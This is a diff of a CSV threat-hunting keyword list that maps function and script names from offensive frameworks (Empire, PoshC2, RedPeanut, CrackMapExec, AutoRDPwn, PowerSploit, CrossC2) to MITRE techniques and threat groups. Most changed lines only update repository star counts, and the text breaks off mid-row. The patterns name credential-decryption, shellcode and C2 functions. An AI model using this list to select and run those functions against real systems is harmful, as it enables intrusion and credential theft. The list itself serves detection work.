+"*Get-ClipboardContents.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CompressedAgent*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedAgent.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*Get-ComputerDetails*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*GetComputersFromActiveDirectory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider 
- APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-creditcarddata *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-ComputerDetails*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GetComputersFromActiveDirectory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-creditcarddata *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-CredPersist*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*getCrossC2Beacon*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*getCrossC2Site*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*Get-DCBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DCBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DecodedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-DecodedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecodedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Get-DecryptedCpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-DecryptedCpassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecryptedCpassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DecryptedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-DecryptedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-DecryptedSitelistPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecryptedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecryptedSitelistPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-delegation *All*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. 
Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-delegation *Unconstrained*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*Get-DFSshare*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-DFSshare*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-DiscosdurosGet-PSDrive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*getdllbaseaddress*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get-dodgyprocesses*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - 
